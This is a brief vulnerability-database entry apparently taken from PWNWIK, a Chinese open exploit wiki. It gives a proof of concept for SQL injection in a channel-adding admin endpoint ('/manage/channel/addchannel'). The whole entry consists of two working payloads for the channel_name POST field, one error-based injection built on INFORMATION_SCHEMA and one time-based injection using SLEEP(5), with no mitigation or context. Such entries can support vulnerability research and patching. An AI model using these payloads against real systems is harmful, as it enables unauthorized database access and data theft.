PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
POC
http://localhost/index.php?/manage/channel/addchannel POST data: 1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1 2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1
免费、自由、人人可编辑的漏洞库--pwnwiki.com
